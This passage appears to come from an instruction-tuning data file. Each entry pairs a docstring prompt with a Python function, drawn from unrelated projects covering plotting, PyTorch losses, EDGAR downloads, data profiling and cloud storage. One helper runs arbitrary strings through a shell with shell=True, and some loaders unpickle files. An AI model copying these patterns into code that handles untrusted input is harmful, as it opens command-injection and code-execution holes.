1e-9) + inputs = [p.name for p in self.extra_inputs] + inputs.append('SAS.inp') + outputs = [p for p in Path.cwd().iterdir() if p.name not in inputs] + return ResultsSAS(params, time, inputs, outputs) +[INST] Save parameters to a pickle file +Parameters + +filename_or_obj +Path to open file or file object write to. [/INST] def save(self, filename_or_obj: Union[str, BinaryIO]): + if isinstance(filename_or_obj, str): + with open(filename_or_obj, 'wb') as file_obj: + self._save_mapping(file_obj) + else: + self._save_mapping(filename_or_obj) +[INST] Load parameters from a pickle file +Parameters + +filename_or_obj +Path to pickle file or file object to read from. [/INST] def load(self, filename_or_obj: Union[str, BinaryIO]): + if isinstance(filename_or_obj, str): + with open(filename_or_obj, 'rb') as fh: + self._load_mapping(fh) + else: + self._load_mapping(filename_or_obj) +[INST] Return parameters from a pickle file +Parameters + +filename_or_obj +Path to pickle file or file object to read from. [/INST] def from_pickle(cls, filename_or_obj: Union[str, BinaryIO]) -> Parameters: + params = cls() + params.load(filename_or_obj) + return params +[INST] Feedforward behavior of the net.. [/INST] def forward(self, x): + x = x.view(x.shape[0], -1) + x = F.relu(self.fc1(x)) + x = F.log_softmax(self.fc2(x), dim=1) + return x +[INST] Print a table of DIF status information to STDOUT.. [/INST] def print_status_table(dif_statuses: List[DIFStatus], + table_format: str) -> None: + rows = [] + headers = [ + "IP", "DIF Updated", "HW Updated", "DIF Contributor*", + "HW Contributor*", "Functions\nDefined", "Functions\nImplemented", + "Stage" + ] + for dif_status in dif_statuses: + hw_last_modified = dif_status.hw_last_modified[:10] + dif_last_modified = dif_status.dif_last_modified[:10] + if dif_status.hw_last_modified > dif_status.dif_last_modified: + hw_last_modified = colored(hw_last_modified, "yellow") + dif_last_modified = colored(dif_last_modified, "yellow") + if dif_status.api_complete: + num_funcs_defined = colored(dif_status.num_functions_defined, + "green") + num_funcs_implemented = colored( + dif_status.num_functions_implemented, "green") + else: + num_funcs_defined = colored(dif_status.num_functions_defined, + "red") + num_funcs_implemented = colored( + dif_status.num_functions_implemented, "red") + rows.append([ + dif_status.ip, dif_last_modified, hw_last_modified, + "\n".join(dif_status.dif_main_contributors), + "\n".join(dif_status.hw_main_contributors), num_funcs_defined, + num_funcs_implemented, dif_status.lifecycle_state + ]) + print("DIF Statuses:") + print(tabulate(rows, headers, tablefmt=table_format)) + print("""*Only the top two contributors (by LOC) """ + """for each component are listed.""") + print(colored("Yellow", "yellow"), + "\t= HW has been updated since the DIF.") + print( + colored("Green", "green"), + """\t= DIF API, as defined in the current header file, is complete. """ + """Note, the header file may lack necessary API functionality.""") + print(colored("Red", "red"), + ("\t= DIF API is incomplete, as defined in the header file or the " + "work has not yet begun.")) +[INST] Print a table of specific functions names DIF functions to STDOUT.. [/INST] def print_function_set(dif_statuses: List[DIFStatus], + dif_function_type: _DIFFunctionType, + table_format: str) -> None: + if dif_function_type == _DIFFunctionType.ALERT: + print("Alert Functions:") + elif dif_function_type == _DIFFunctionType.IRQ: + print("IRQ Functions:") + elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED: + print("Unimplemented Functions:") + else: + logging.error("Invalid function type to print table.") + sys.exit(1) + rows = [] + headers = ["IP", "Function"] + for dif_status in dif_statuses: + if dif_function_type == _DIFFunctionType.ALERT: + if dif_status.alert_funcs: + rows.append([dif_status.ip, "\n".join(dif_status.alert_funcs)]) + elif dif_function_type == _DIFFunctionType.IRQ: + if dif_status.irq_funcs: + rows.append([dif_status.ip, "\n".join(dif_status.irq_funcs)]) + elif dif_function_type == _DIFFunctionType.UNIMPLEMENTED: + if not dif_status.api_complete: + rows.append( + [dif_status.ip, "\n".join(dif_status.funcs_unimplemented)]) + else: + logging.error("Invalid function type to print table.") + sys.exit(1) + print(tabulate(rows, headers, tablefmt=table_format)) +[INST] Get all urls for specific company according to CIK that match +start date, end date, filing_type, and count parameters.. [/INST] def _get_urls_for_cik(self, cik, **kwargs): + self.params['CIK'] = cik + links = [] + self.params["start"] = 0 + while len(links) < self._client.count: + data = self._client.get_soup(self.path, self.params, **kwargs) + links.extend([link.string for link in data.find_all("filinghref")]) + self.params["start"] += self._client.count + if len(data.find_all("filinghref")) == 0: + break + txt_urls = [link[:link.rfind("-")] + ".txt" for link in links] + return txt_urls[:self.client.count] +[INST] Save files in specified directory.. [/INST] def save(self, directory): + urls = self.get_urls() + if len(urls) == 0: + raise ValueError("No filings available.") + doc_names = [url.split("/")[-1] for url in urls] + for (url, doc_name) in list(zip(urls, doc_names)): + cik = doc_name.split('-')[0] + data = requests.get(url).text + path = os.path.join(directory, cik, self.filing_type.value) + make_path(path) + path = os.path.join(path, doc_name) + with open(path, "w") as f: + f.write(data) +[INST] Sanitizes date to be in acceptable format for EDGAR.. [/INST] def sanitize_date(date): + if isinstance(date, datetime.datetime): + return date.strftime("%Y%m%d") + elif isinstance(date, str): + if len(date) != 8: + raise TypeError('Date must be of the form YYYYMMDD') + elif isinstance(date, int): + if date < 10 ** 7 or date > 10 ** 8: + raise TypeError('Date must be of the form YYYYMMDD') + return date +[INST] Make directory based on filing info.. [/INST] def make_path(path, **kwargs): + if not os.path.exists(path): + try: + os.makedirs(path, **kwargs) + except OSError as e: + if e.errno != errno.EEXIST: + raise OSError +[INST] Ensures response from EDGAR is valid.. [/INST] def _validate_response(response): + error_messages = ("The value you submitted is not valid", + "No matching Ticker Symbol.", + "No matching CIK.", + "No matching companies.") + if response is None: + raise EDGARQueryError("No response.") + status_code = response.status_code + if 400 <= status_code < 500: + if status_code == 400: + raise EDGARQueryError("The query could not be completed. " + "The page does not exist.") + else: + raise EDGARQueryError("The query could not be completed. " + "There was a client-side error with your " + "request.") + elif 500 <= status_code < 600: + raise EDGARQueryError("The query could not be completed. " + "There was a server-side error with " + "your request.") + elif any(error_message in response.text for error_message in error_messages): + raise EDGARQueryError() +[INST] Get cik for lookup value.. [/INST] def _get_cik(self, lookup): + self._validate_lookup(lookup) + try: + self._params['CIK'] = lookup + soup = self._client.get_soup(self.path, self.params) + except EDGARQueryError: + del self._params['CIK'] + self._params['company'] = lookup + soup = self._client.get_soup(self.path, self.params) + try: + span = soup.find('span', {'class': 'companyName'}) + return span.find('a').getText().split()[0] + except AttributeError: + warnings.warn("Lookup '{0}' will be skipped. " + "Found multiple companies matching '{0}':".format(lookup)) + warnings.warn('\n'.join(self._get_cik_possibilities(soup))) + finally: + if self._params.get('company') is not None: + del self._params['company'] + if self._params.get('CIK') is not None: + del self._params['CIK'] +[INST] Ensure that lookup is string.. [/INST] def _validate_lookup(lookup): + if not isinstance(lookup, str): + raise TypeError("Lookup value must be string. Given type {0}.".format(type(lookup))) +[INST] Publish PR comment with link to build logs.. [/INST] def publish_pr_comment(self, build): + pr_comment = PR_COMMENT_TEMPLATE.format( + project_name=config.PROJECT_NAME, + commit_id=build.commit_id, + build_status=build.status, + logs_url=build.get_logs_url(), + ) + repo = self._get_repo() + LOG.debug('Publishing PR Comment: repo=%s/%s, pr_id=%s, comment=%s', + self._github_owner, self._github_repo, build.get_pr_id(), pr_comment) + repo.get_pull(build.get_pr_id()).create_issue_comment(pr_comment) +[INST] plot 3 histogram of data projecting to difference vector w. [/INST] def exec_c3_1_a(X_a, X_b, init_w): + n_histogram = 3 + proj_a = np.zeros((X_a.shape[0], n_histogram)) + proj_b = np.zeros((X_b.shape[0], n_histogram)) + new_w = np.zeros((init_w.shape[0], n_histogram)) + for i in range(n_histogram): + new_w[:, i] = (init_w + np.array(np.random.randn(*init_w.shape))).ravel() + proj_a[:, i] = utils.project_X_onto_w(X_a, new_w[:, i]).ravel() + proj_b[:, i] = utils.project_X_onto_w(X_b, new_w[:, i]).ravel() + plot_data.plt_histogram(proj_a, proj_b, new_w) +[INST] plot probability contours and the optimal projection line. [/INST] def plot_prob_contours(Gaus_dist_a, Gaus_dist_b, with_unbalance=False): + assert(isinstance(Gaus_dist_a, model.GausDS) and isinstance(Gaus_dist_b, model.GausDS)) + X_a, X_b = Gaus_dist_a.data, Gaus_dist_b.data + n_a = len(X_a) + n_b = len(X_b) + l_s_scalar_min = -9 + l_s_scalar_max = 9 + ls_x1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + ls_x2 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + mg_x1, mg_x2 = np.meshgrid(ls_x1, ls_x2) + pdf_a = Gaus_dist_a.Gaussian_pdf(mg_x1, mg_x2, 100) + pdf_b = Gaus_dist_b.Gaussian_pdf(mg_x1, mg_x2, 100) + pdf_a = pdf_a * n_a/(n_a+n_b) + pdf_b = pdf_b * n_b/(n_a+n_b) + fig = plt.figure() + ax = fig.add_subplot(111) + ax.axis('equal') + ax.set_title("2 Class Classification") + ax.scatter(X_a[:, 0], X_a[:, 1], marker='.', c='r', label='class a') + ax.scatter(X_b[:, 0], X_b[:, 1], marker='+', c='b', label='class b') + ax.contour(mg_x1, mg_x2, pdf_a, 10) + ax.contour(mg_x1, mg_x2, pdf_b, 10) + log_odds = np.log(pdf_a) - np.log(pdf_b) + list_border = [] + for i in range(99): + for j in range(99): + if (log_odds[i][j]*log_odds[i][j+1] < 0) or (log_odds[i][j]*log_odds[i+1][j] < 0) \ + or log_odds[i][j] == 0: + list_border.append([i, j]) + bd = np.array(list_border) + X1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + Y1 = np.linspace(l_s_scalar_min, l_s_scalar_max, 100) + ax.scatter(X1[bd[:, 0]], Y1[bd[:, 1]], marker='.', s=15, color='brown', label='decision border') + init_w = np.array([1, -2]).reshape(-1, 1) + fs_clf = model.FisherScoreClassifier(X_a, X_b, init_w) + w_star = fs_clf.classify(plot=False) + w_star = np.array(w_star) + xielv = w_star[1]/w_star[0] + x_point = np.linspace(-5, 3, 100) + y_point = x_point * xielv - 4 + plt.plot(x_point, y_point, c='g', label='optimal w') + if with_unbalance: + w_star = fs_clf.classify(balanced=False, plot=False) + w_star = np.array(w_star) + xielv = w_star[1]/w_star[0] + x_point = np.linspace(-5, 3, 100) + y_point = x_point * xielv - 4 + plt.plot(x_point, y_point, c='purple', label='unbalanced F(w)') + leg = ax.legend(loc='upper right', fancybox=True, fontsize=8) + leg.get_frame().set_alpha(0.5) + plt.show() +[INST] project a list of vectors X onto a vector w. [/INST] def project_X_onto_w(X, v_w): + w_length = np.linalg.norm(v_w) + assert(w_length > 0) + return np.divide((X @ v_w), w_length) +[INST] Signals to the transport that it should stop.. [/INST] async def stop(self): + raise NotImplementedError +[INST] Pushes a message to a channel.. [/INST] async def push(self, event, payload): + msg = await self.socket._send_message(self.topic, event, payload) + return msg +[INST] Classification loss (NLL) +targets dicts must contain the key "labels" containing a tensor of dim [nb_target_boxes]. [/INST] def loss_labels(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_logits' in outputs + src_logits = outputs['pred_logits'] + idx = self._get_src_permutation_idx(indices) + target_classes_o = torch.cat([tgt[:, 0][J].long() for tgt, (_, J) in zip (targets, indices)]) + target_classes = torch.full(src_logits.shape[:2], self.num_classes, dtype=torch.int64, device=src_logits.device) + target_classes[idx] = target_classes_o + loss_ce = F.cross_entropy(src_logits.transpose(1, 2), target_classes, self.empty_weight.cuda()) + losses = {'loss_ce': loss_ce} + if log: + losses['class_error'] = 100 - accuracy(src_logits[idx], target_classes_o)[0] + return losses +[INST] Compute the cardinality error, ie the absolute error in the number of predicted non-empty boxes +This is not really a loss, it is intended for logging purposes only. It doesn't propagate gradients. [/INST] def loss_cardinality(self, outputs, targets, indices, num_planes): + pred_logits = outputs['pred_logits'] + device = pred_logits.device + tgt_lengths = torch.as_tensor([tgt.shape[0] for tgt in targets], device=device) + card_pred = (pred_logits.argmax(-1) != pred_logits.shape[-1] - 1).sum(1) + card_err = F.l1_loss(card_pred.float(), tgt_lengths.float()) + losses = {'cardinality_error': card_err} + return losses +[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss +targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4] +The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. [/INST] def loss_param(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_param' in outputs + idx = self._get_src_permutation_idx(indices) + src_param = outputs['pred_param'][idx] + target_param = torch.cat([tgt[:, 1:4][i] for tgt, (_, i) in zip(targets, indices)], dim=0) + loss_param_l1 = torch.mean(torch.sum(torch.abs(target_param - src_param), dim=1)) + similarity = torch.nn.functional.cosine_similarity(src_param, target_param, dim=1) + loss_param_cos = torch.mean(1-similarity) + angle = torch.mean(torch.acos(torch.clamp(similarity, -1, 1))) + losses = {} + losses['loss_param_l1'] = loss_param_l1 + losses['loss_param_cos'] = loss_param_cos + if log: + losses['mean_angle'] = angle * 180.0 / np.pi + return losses +[INST] Compute the losses related to the bounding boxes, the L1 regression loss and the GIoU loss +targets dicts must contain the key "boxes" containing a tensor of dim [nb_target_boxes, 4] +The target boxes are expected in format (center_x, center_y, h, w), normalized by the image size.. [/INST] def loss_center(self, outputs, targets, indices, num_planes, log=True): + assert 'pred_center' in outputs + idx = self._get_src_permutation_idx(indices) + src_center = outputs['pred_center'][idx] + target_center = torch.cat([tgt[:, 4:6][i] for tgt, (_, i) in zip(targets, indices)], dim=0) + delta_xy = torch.abs(target_center - src_center) + dist = torch.norm(delta_xy, dim=-1) + loss_center_l2 = torch.mean(dist) + losses = {} + losses['loss_center_instance'] = loss_center_l2 + if 'gt_plane_pixel_centers' in outputs.keys(): + gt_plane_pixel_centers = outputs['gt_plane_pixel_centers'] + pixel_center = outputs['pixel_center'] + valid_region = outputs['valid_region'] + mask = valid_region > 0 + pixel_dist = torch.norm(torch.abs(gt_plane_pixel_centers - pixel_center), dim=1, keepdim=True) + loss_pixel_center = torch.mean(pixel_dist[mask]) + losses['loss_center_pixel'] = loss_pixel_center + return losses +[INST] This performs the loss computation.. [/INST] def forward(self, outputs, targets): + outputs_without_aux = {k: v for k, v in outputs.items() if k != 'aux_outputs'} + indices = self.matcher(outputs_without_aux, targets) + num_planes = sum(tgt.shape[0] for tgt in targets) + num_planes = torch.as_tensor([num_planes], dtype=torch.float, device=next(iter(outputs.values())).device) + if is_dist_avail_and_initialized(): + torch.distributed.all_reduce(num_planes) + num_planes = torch.clamp(num_planes / get_world_size(), min=1).item() + losses = {} + for loss in self.losses: + losses.update(self.get_loss(loss, outputs, targets, indices, num_planes)) + losses_aux = [] + if 'aux_outputs' in outputs.keys(): + for i, aux_outputs in enumerate(outputs['aux_outputs']): + losses_aux_i = {} + for loss in self.losses: + kwargs = {} + if 'param' in loss or 'Q' in loss or 'depth' in loss: + continue + kwargs = {'log': False} + l_dict = self.get_loss(loss, aux_outputs, targets, indices, num_planes, **kwargs) + losses_aux_i.update(l_dict) + losses_aux.append(losses_aux_i) + return losses, indices, losses_aux +[INST] Randomly sample a batch of experiences from memory.. [/INST] def sample(self, device): + experiences = random.sample(self.memory, k=self.batch_size) + states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device) + actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device) + rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device) + next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(device) + dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device) + return (states, actions, rewards, next_states, dones) +[INST] Add a new experience to memory.. [/INST] def add(self, state, action, reward, next_state, done): + self.length = min(self.length+1, self.buffer_size) + max_p = self.get_max_p(); + self.tree.add(max_p, (state, action, reward, next_state, done)) +[INST] Convenience property to retrieve the value tuple as a tuple of +datetime objects.. [/INST] def value_as_datetime(self): + if self.value is None: + return None + v1, v2 = self.value + if isinstance(v1, numbers.Number): + d1 = datetime.utcfromtimestamp(v1 / 1000) + else: + d1 = v1 + if isinstance(v2, numbers.Number): + d2 = datetime.utcfromtimestamp(v2 / 1000) + else: + d2 = v2 + return d1, d2 +[INST] Convenience property to retrieve the value tuple as a tuple of +date objects.. [/INST] def value_as_date(self): + if self.value is None: + return None + v1, v2 = self.value + if isinstance(v1, numbers.Number): + dt = datetime.utcfromtimestamp(v1 / 1000) + d1 = date(*dt.timetuple()[:3]) + else: + d1 = v1 + if isinstance(v2, numbers.Number): + dt = datetime.utcfromtimestamp(v2 / 1000) + d2 = date(*dt.timetuple()[:3]) + else: + d2 = v2 + return d1, d2 +[INST] Compute functions for plot(df, x) +Parameters + +df +DataFrame from which visualizations are generated +x +A column name from the DataFrame +cfg +Config instance +dtype: str or DType or dict of str or dict of DType, default None +Specify Data Types for designated column or all columns.. [/INST] def compute_univariate( + df: Union[dd.DataFrame, pd.DataFrame], + col: Union[str, LatLong], + cfg: Config, + dtype: Optional[DTypeDef], +) -> Intermediate: + new_col_names, ndf = gen_new_df_with_used_cols(df, col, None, None) + x = new_col_names[col] + if x is None: + raise ValueError + frame = EDAFrame(ndf, dtype) + col_dtype = frame.get_eda_dtype(x) + if isinstance(col_dtype, (Nominal, GeoPoint, SmallCardNum)): + srs = frame.get_col_as_str(x) + (data,) = dask.compute(nom_comps(srs, cfg)) + return Intermediate(col=x, data=data, visual_type="categorical_column") + elif isinstance(col_dtype, Continuous): + (data,) = dask.compute(cont_comps(frame.frame[x], cfg)) + return Intermediate(col=x, data=data, visual_type="numerical_column") + elif isinstance(col_dtype, DateTime): + data_dt: List[Any] = [] + data_dt.append(dask.delayed(calc_stats_dt)(frame.frame[x])) + if cfg.line.enable: + data_dt.append(dask.delayed(_calc_line_dt)(frame.frame[[x]], cfg.line.unit)) + data, line = dask.compute(*data_dt) + else: + data = dask.compute(*data_dt)[0] + line = [] + return Intermediate( + col=x, + data=data, + line=line, + visual_type="datetime_column", + ) + elif isinstance(col_dtype, GeoGraphy): + (data,) = dask.compute(nom_comps(frame.frame[x], cfg)) + return Intermediate(col=x, data=data, visual_type="geography_column") + else: + raise ValueError(f"unprocessed type. col:{x}, type:{col_dtype}") +[INST] All computations required for plot(df, Nominal). Assume srs is string column.. [/INST] def nom_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]: + data: Dict[str, Any] = dict() + data["nrows"] = srs.shape[0] + srs = srs.dropna() + grps = srs.value_counts(sort=False) + data["geo"] = grps + data["nuniq"] = grps.shape[0] + if cfg.bar.enable or cfg.pie.enable or cfg.value_table.enable: + data["bar"] = ( + grps.nlargest(cfg.bar.bars) if cfg.bar.sort_descending else grps.nsmallest(cfg.bar.bars) + ) + if cfg.bar.bars == cfg.pie.slices and cfg.bar.sort_descending == cfg.pie.sort_descending: + data["pie"] = data["bar"] + else: + data["pie"] = ( + grps.nlargest(cfg.pie.slices) + if cfg.pie.sort_descending + else grps.nsmallest(cfg.pie.slices) + ) + if cfg.bar.bars == cfg.value_table.ngroups and cfg.bar.sort_descending: + data["value_table"] = data["bar"] + elif cfg.pie.slices == cfg.value_table.ngroups and cfg.pie.sort_descending: + data["value_table"] = data["pie"] + else: + data["value_table"] = grps.nlargest(cfg.value_table.ngroups) + if cfg.insight.enable: + data["chisq"] = chisquare(grps.values) + df = grps.reset_index() + if cfg.stats.enable or cfg.value_table.enable: + data.update(_calc_nom_stats(srs, df, data["nrows"], data["nuniq"])) + elif cfg.wordfreq.enable and cfg.insight.enable: + data["len_stats"] = {"Minimum": srs.str.len().min(), "Maximum": srs.str.len().max()} + if cfg.wordlen.enable: + lens = srs.str.len() + data["len_hist"] = da.histogram(lens, cfg.wordlen.bins, (lens.min(), lens.max())) + if cfg.wordcloud.enable or cfg.wordfreq.enable: + if all( + getattr(cfg.wordcloud, att) == getattr(cfg.wordfreq, att) + for att in ("top_words", "stopword", "stem", "lemmatize") + ): + word_freqs = _calc_word_freq( + df, + cfg.wordfreq.top_words, + cfg.wordfreq.stopword, + cfg.wordfreq.lemmatize, + cfg.wordfreq.stem, + ) + data["word_cnts_cloud"] = word_freqs["word_cnts"] + data["nuniq_words_cloud"] = word_freqs["nuniq_words"] + else: + word_freqs = _calc_word_freq( + df.copy(), + cfg.wordfreq.top_words, + cfg.wordfreq.stopword, + cfg.wordfreq.lemmatize, + cfg.wordfreq.stem, + ) + word_freqs_cloud = _calc_word_freq( + df, + cfg.wordcloud.top_words, + cfg.wordcloud.stopword, + cfg.wordcloud.lemmatize, + cfg.wordcloud.stem, + ) + data["word_cnts_cloud"] = word_freqs_cloud["word_cnts"] + data["nuniq_words_cloud"] = word_freqs["nuniq_words"] + data["word_cnts_freq"] = word_freqs["word_cnts"] + data["nwords_freq"] = word_freqs["nwords"] + return data +[INST] All computations required for plot(df, Continuous). [/INST] def cont_comps(srs: dd.Series, cfg: Config) -> Dict[str, Any]: + data: Dict[str, Any] = {} + data["nrows"] = srs.shape[0] + srs = srs.dropna() + data["npres"] = srs.shape[0] + srs = srs[~srs.isin({np.inf, -np.inf})] + if cfg.hist.enable or cfg.qqnorm.enable and cfg.insight.enable: + data["hist"] = da.histogram(srs, cfg.hist.bins, (srs.min(), srs.max())) + if cfg.insight.enable: + data["norm"] = normaltest(data["hist"][0]) + if cfg.hist.enable and cfg.insight.enable: + data["chisq"] = chisquare(data["hist"][0]) + if cfg.qqnorm.enable: + data["qntls"] = srs.quantile(np.linspace(0.01, 0.99, 99)) + elif cfg.stats.enable: + data["qntls"] = srs.quantile([0.05, 0.25, 0.5, 0.75, 0.95]) + elif cfg.box.enable: + data["qntls"] = srs.quantile([0.25, 0.5, 0.75]) + if cfg.stats.enable or cfg.hist.enable and cfg.insight.enable: + data["skew"] = skew(srs) + if cfg.stats.enable or cfg.qqnorm.enable: + data["mean"] = srs.mean() + data["std"] = srs.std() + if cfg.stats.enable: + data["min"] = srs.min() + data["max"] = srs.max() + data["nreals"] = srs.shape[0] + data["nzero"] = (srs == 0).sum() + data["nneg"] = (srs < 0).sum() + data["kurt"] = kurtosis(srs) + data["mem_use"] = srs.memory_usage(deep=True) + if cfg.kde.enable: + if not math.isclose(dask.compute(data["min"])[0], dask.compute(data["max"])[0]): + data["dens"] = da.histogram(srs, cfg.kde.bins, (srs.min(), srs.max()), density=True) + data["kde"] = gaussian_kde( + srs.map_partitions(lambda x: x.sample(min(1000, x.shape[0])), meta=srs) + ) + else: + data["kde"] = None + if cfg.box.enable: + data.update(_calc_box(srs, data["qntls"], cfg)) + if cfg.value_table.enable: + value_counts = srs.value_counts(sort=False) + data["nuniq"] = value_counts.shape[0] + data["value_table"] = value_counts.nlargest(cfg.value_table.ngroups) + elif cfg.stats.enable: + data["nuniq"] = srs.nunique_approx() + return data +[INST] Parse a categorical column of text data into words, then compute +the frequency distribution of words and the total number of words.. [/INST] def _calc_word_freq( + df: dd.DataFrame, + top_words: int, + stopword: bool, + lemmatize: bool, + stem: bool, +) -> Dict[str, Any]: + col = df.columns[0] + regex = fr"\b(?:{'|'.join(ess)})\b|[^\w+ ]" if stopword else r"[^\w+ ]" + df[col] = df[col].str.replace(regex, "").str.lower().str.split() + df = df.explode(col) + if lemmatize or stem: + df[col] = df[col].dropna() + if lemmatize: + df[col] = df[col].apply(WordNetLemmatizer().lemmatize, meta=object) + if stem: + df[col] = df[col].apply(PorterStemmer().stem, meta=object) + word_cnts = df.groupby(col)[df.columns[1]].sum() + nwords = word_cnts.sum() + nuniq_words = word_cnts.shape[0] + fnl_word_cnts = word_cnts.nlargest(top_words) + return {"word_cnts": fnl_word_cnts, "nwords": nwords, "nuniq_words": nuniq_words} +[INST] Calculate statistics for a nominal column. [/INST] def _calc_nom_stats( + srs: dd.Series, + df: dd.DataFrame, + nrows: int, + nuniq: dd.core.Scalar, +) -> Dict[str, Any]: + stats = { + "nrows": nrows, + "npres": srs.shape[0], + "nuniq": nuniq, + "mem_use": srs.memory_usage(deep=True), + "first_rows": srs.reset_index(drop=True).loc[:4], + } + leng = { + "Mean": srs.str.len().mean(), + "Standard Deviation": srs.str.len().std(), + "Median": srs.str.len().quantile(0.5), + "Minimum": srs.str.len().min(), + "Maximum": srs.str.len().max(), + } + grp, col = df.columns + lc_cnt = (df[grp].str.count(r"[a-z]") * df[col]).sum() + uc_cnt = (df[grp].str.count(r"[A-Z]") * df[col]).sum() + letter = { + "Count": lc_cnt + uc_cnt, + "Lowercase Letter": lc_cnt, + "Space Separator": (df[grp].str.count(r"[ ]") * df[col]).sum(), + "Uppercase Letter": uc_cnt, + "Dash Punctuation": (df[grp].str.count(r"[-]") * df[col]).sum(), + "Decimal Number": (df[grp].str.count(r"[0-9]") * df[col]).sum(), + } + return {"stats": stats, "len_stats": leng, "letter_stats": letter} +[INST] Calculate stats from a datetime column. [/INST] def calc_stats_dt(srs: dd.Series) -> Dict[str, str]: + size = srs.shape[0] + count = srs.count() + try: + uniq_count = srs.nunique_approx() + except: + uniq_count = srs.nunique() + overview_dict = { + "Distinct Count": uniq_count, + "Approximate Unique (%)": uniq_count / count, + "Missing": size - count, + "Missing (%)": 1 - (count / size), + "Memory Size": srs.memory_usage(deep=True), + "Minimum": srs.min(), + "Maximum": srs.max(), + } + return overview_dict +[INST] This function apply clean functions on input dataset.. [/INST] def clean_data() -> Any: + info = request.get_json() + clean_func = info["clean_func"] + col = info["col"] + global index_df + df_cleaned = clean_function_dic[clean_func](index_df, column=col, inplace=True) + df_cleaned = df_cleaned.astype(str) + col_names = df_cleaned.columns.values.tolist() + table_columns = [] + for col_name in col_names: + temp_dic = {} + temp_dic["colName"] = col_name + temp_dic["colLabel"] = col_name + temp_dic["colWidth"] = 180 + table_columns.append(temp_dic) + transposed_json = df_cleaned.T.to_dict() + table_data = [] + for key in transposed_json: + table_data.append(transposed_json[key]) + index_df = df_cleaned + return {"tableData": table_data, "tableColumns": table_columns} +[INST] @return return a list containing all the extension of the implemented data structures. [/INST] def extensions_generator(): + extensions = [] + for dse in impl_data_structure: + ds_source = glob.glob("cy_alg/{}.pyx".format(dse.py_name)) + ds_source += glob.glob("c_alg/src/{}.c".format(dse.c_name)) + if dse.other_src: + for src in dse.other_src: + ds_source += glob.glob(src) + extension = Extension( + dse.py_name, + sources=ds_source, + include_dirs=inc_dirs, + library_dirs=lib_dirs, + libraries=libs, + ) + extensions.append(extension) + return extensions +[INST] Takes a not-yet-processed tweet in the form of [word1, word2, ..., wordn] +Returns a list of manual features adapted from ../resource/2872427.2883062.pdf + +length of comment in tokens +average length of word +number of periods, question marks, quotes, and exclamation marks +number of one letter tokens +number of capitalized letters +number of non-alpha characters. [/INST] def extract_manual_features(tweet): + length = len(tweet) + averageWordLength = sum([len(word) for word in tweet])//length + oneLetter = sum([1 for word in tweet if len(word) == 1]) + tweet = " ".join(tweet) + punctuationCount = 0 + for each in [".","?","\"","\'","!"]: + punctuationCount += tweet.count(each) + capitalized = 0 + nonAlpha = 0 + for each in tweet: + if each.isupper(): + capitalized += 1 + if not each.isalpha() and each != " ": + nonAlpha += 1 + manual_features = [length, averageWordLength, oneLetter, punctuationCount, capitalized, nonAlpha] + return manual_features +[INST] Takes a file with each line being one word +Returns a list of lowercase word. [/INST] def process_words(words): + wordList = [] + for word in words: + wordList.append(word.strip().lower()) + return wordList +[INST] Takes a list of processed tweets +Returns a feature matrix +See detailed comments below. [/INST] def generate_matrix(tweets, words): + wordsLentgh = len(words) + featureMatrix = [] + for tweet in tweets: + featureVector = [0] * wordsLentgh + for i in range(wordsLentgh): + featureVector[i] = tweet[2].count(words[i]) + featureVector.extend(tweet[3]) + featureVector.append(tweet[4]) + featureMatrix.append(featureVector) + return featureMatrix +[INST] put_object +object storage service file upload. [/INST] def put_object(bucketName, objectName, content): + signer = oci.auth.signers.get_resource_principals_signer() + client = oci.object_storage.ObjectStorageClient(config={}, signer=signer) + namespace = client.get_namespace().data + output="" + try: + object = client.put_object(namespace, bucketName, objectName, content) + output = "Success: Put object '" + objectName + "' in bucket '" + bucketName + "'" + except Exception as e: + output = "Failed: " + str(e.message) + return { "state": output } +[INST] shell_exec +invoke the shell to run a local command. [/INST] def shell_exec(exec_command, exec_count): + p_response = Popen([exec_command], + shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True + ) + output, errors = p_response.communicate() + logging.info("Popen Output " + str(exec_count) + ": " + output) + logging.info("Popen Errors " + str(exec_count) + ": " + errors) + return +[INST] Reads from socket until all messages from the list are received +Returns the list of messages read. [/INST] async def read_until(socket, messages): + messages = messages.copy() + res = [] + while messages: + data = await socket.receive_json() + res += [data] + if data in messages: + messages.remove(data) + return res +[INST] Set flow rate in uL/mm, to value obtained from command's params, +or if unspecified in command params, then from protocol's "default-values".. [/INST] def _set_flow_rate( + pipette_model, pipette, command_type, params, default_values): + default_aspirate = default_values.get( + 'aspirate-flow-rate', {}).get(pipette_model) + default_dispense = default_values.get( + 'dispense-flow-rate', {}).get(pipette_model) + flow_rate_param = params.get('flow-rate') + if flow_rate_param is not None: + if command_type == 'aspirate': + pipette.set_flow_rate( + aspirate=flow_rate_param, + dispense=default_dispense) + return + if command_type == 'dispense': + pipette.set_flow_rate( + aspirate=default_aspirate, + dispense=flow_rate_param) + return + pipette.set_flow_rate( + aspirate=default_aspirate, + dispense=default_dispense + ) +[INST] This is the (somewhat) synchronous method to use to do a restart. +It actually starts a thread that does the restart. `__wait_and_restart`, +on the other hand, should not be called directly, because it will block +until the system restarts.. [/INST] def do_restart(): + Thread(target=__wait_and_restart).start() +[INST] Delay and then execute the restart. Do not call directly.. [/INST] def __wait_and_restart(): + log.info('Restarting server') + sleep(1) + loop = asyncio.new_event_loop() + loop.run_until_complete(_resin_supervisor_restart()) +[INST] Execute a container restart by requesting it from the supervisor. +Note that failures here are returned but most likely will not be +sent back to the caller, since this is run in a separate workthread. +If the system is not responding, look for these log messages.. [/INST] async def _resin_supervisor_restart(): + supervisor = os.environ.get('RESIN_SUPERVISOR_ADDRESS', + 'http://127.0.0.1:48484') + restart_url = supervisor + '/v1/restart' + api = 